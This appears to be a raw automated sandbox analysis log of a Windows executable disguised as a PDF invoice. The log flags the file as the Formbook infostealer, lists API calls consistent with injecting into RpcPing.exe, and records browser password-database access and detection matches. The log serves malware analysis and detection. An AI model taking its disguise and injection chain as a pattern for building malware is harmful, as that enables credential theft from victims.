Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DD0 NtDelayExecution, 3_2_01A52DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D30 NtUnmapViewOfSection, 3_2_01A52D30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D00 NtSetInformationFile, 3_2_01A52D00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D10 NtMapViewOfSection, 3_2_01A52D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CA0 NtQueryInformationToken, 3_2_01A52CA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CF0 NtOpenProcess, 3_2_01A52CF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CC0 NtQueryVirtualMemory, 3_2_01A52CC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C00 NtQueryInformationProcess, 3_2_01A52C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C60 NtCreateKey, 3_2_01A52C60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FA0 NtQuerySection, 3_2_01A52FA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FB0 NtResumeThread, 3_2_01A52FB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F90 NtProtectVirtualMemory, 3_2_01A52F90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FE0 NtCreateFile, 3_2_01A52FE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F30 NtCreateSection, 3_2_01A52F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F60 NtCreateProcessEx, 3_2_01A52F60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EA0 NtAdjustPrivilegesToken, 3_2_01A52EA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E80 NtReadVirtualMemory, 3_2_01A52E80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EE0 NtQueueApcThread, 3_2_01A52EE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E30 NtWriteVirtualMemory, 3_2_01A52E30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53090 NtSetValueKey, 3_2_01A53090
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53010 NtOpenDirectoryObject, 3_2_01A53010
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A539B0 NtGetContextThread, 3_2_01A539B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D10 NtOpenProcessToken, 3_2_01A53D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D70 NtOpenThread, 3_2_01A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54340 NtSetContextThread,LdrInitializeThunk, 8_2_03A54340
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54650 NtSuspendThread,LdrInitializeThunk, 8_2_03A54650
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_03A52BA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_03A52BE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03A52BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B60 NtClose,LdrInitializeThunk, 8_2_03A52B60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AF0 NtWriteFile,LdrInitializeThunk, 8_2_03A52AF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AD0 NtReadFile,LdrInitializeThunk, 8_2_03A52AD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FB0 NtResumeThread,LdrInitializeThunk, 8_2_03A52FB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FE0 NtCreateFile,LdrInitializeThunk, 8_2_03A52FE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F30 NtCreateSection,LdrInitializeThunk, 8_2_03A52F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_03A52E80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03A52EE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03A52DF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03A52DD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_03A52D30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03A52D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03A52CA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C60 NtCreateKey,LdrInitializeThunk, 8_2_03A52C60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03A52C70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A535C0 NtCreateMutant,LdrInitializeThunk, 8_2_03A535C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A539B0 NtGetContextThread,LdrInitializeThunk, 8_2_03A539B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B80 NtQueryInformationFile, 8_2_03A52B80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AB0 NtWaitForSingleObject, 8_2_03A52AB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FA0 NtQuerySection, 8_2_03A52FA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F90 NtProtectVirtualMemory, 8_2_03A52F90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F60 NtCreateProcessEx, 8_2_03A52F60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EA0 NtAdjustPrivilegesToken, 8_2_03A52EA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E30 NtWriteVirtualMemory, 8_2_03A52E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DB0 NtEnumerateKey, 8_2_03A52DB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D00 NtSetInformationFile, 8_2_03A52D00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CF0 NtOpenProcess, 8_2_03A52CF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CC0 NtQueryVirtualMemory, 8_2_03A52CC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C00 NtQueryInformationProcess, 8_2_03A52C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53090 NtSetValueKey, 8_2_03A53090
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53010 NtOpenDirectoryObject, 8_2_03A53010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D10 NtOpenProcessToken, 8_2_03A53D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D70 NtOpenThread, 8_2_03A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288B30 NtReadFile, 8_2_03288B30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032889D0 NtCreateFile, 8_2_032889D0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288E20 NtAllocateVirtualMemory, 8_2_03288E20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288C20 NtDeleteFile, 8_2_03288C20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288CC0 NtClose, 8_2_03288CC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A5DBF9 8_2_03A5DBF9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFB76 8_2_03ADFB76
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A65AA0 8_2_03A65AA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABDAAC 8_2_03ABDAAC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC1AA3 8_2_03AC1AA3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACDAC6 8_2_03ACDAC6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A93A6C 8_2_03A93A6C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFA49 8_2_03ADFA49
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7A46 8_2_03AD7A46
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AB5910 8_2_03AB5910
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29950 8_2_03A29950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3B950 8_2_03A3B950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A238E0 8_2_03A238E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A8D800 8_2_03A8D800
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFFB1 8_2_03ADFFB1
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A21F92 8_2_03A21F92
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD5 8_2_039E3FD5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD2 8_2_039E3FD2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFF09 8_2_03ADFF09
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29EB0 8_2_03A29EB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3FDC0 8_2_03A3FDC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7D73 8_2_03AD7D73
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A23D40 8_2_03A23D40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD1D5A 8_2_03AD1D5A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFCF2 8_2_03ADFCF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A99C32 8_2_03A99C32
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032717C0 8_2_032717C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C747 8_2_0326C747
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C750 8_2_0326C750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326AB36 8_2_0326AB36
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C970 8_2_0326C970
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9ED 8_2_0326A9ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9F0 8_2_0326A9F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03274E30 8_2_03274E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0328B2C0 8_2_0328B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327300D 8_2_0327300D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03273010 8_2_03273010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3038E 8_2_03D3038E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E334 8_2_03D3E334
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E7EC 8_2_03D3E7EC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D4552D 8_2_03D4552D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D454BD 8_2_03D454BD
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E453 8_2_03D3E453
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CAE8 8_2_03D3CAE8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CA8A 8_2_03D3CA8A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3D858 8_2_03D3D858
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CF489 9_2_058CF489
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD9 9_2_058D0CD9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD6 9_2_058D0CD6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA419 9_2_058CA419
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA410 9_2_058CA410
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058E8F89 9_2_058E8F89
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C87FF 9_2_058C87FF
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B9 9_2_058C86B9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B6 9_2_058C86B6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA639 9_2_058CA639
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D2AF9 9_2_058D2AF9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A9F290 appears 103 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A55130 appears 58 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A67E54 appears 107 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A0B970 appears 262 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A0B970 appears 262 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A67E54 appears 107 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A55130 appears 58 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A9F290 appears 103 times
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/4
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\RpcPing.exe File created: C:\Users\user\AppData\Local\Temp\297268BLQ
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RpcPing.exe, 00000008.00000003.2435255903.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432168414.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431409420.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432933782.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431030399.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432548929.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2929881128.00000000033E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
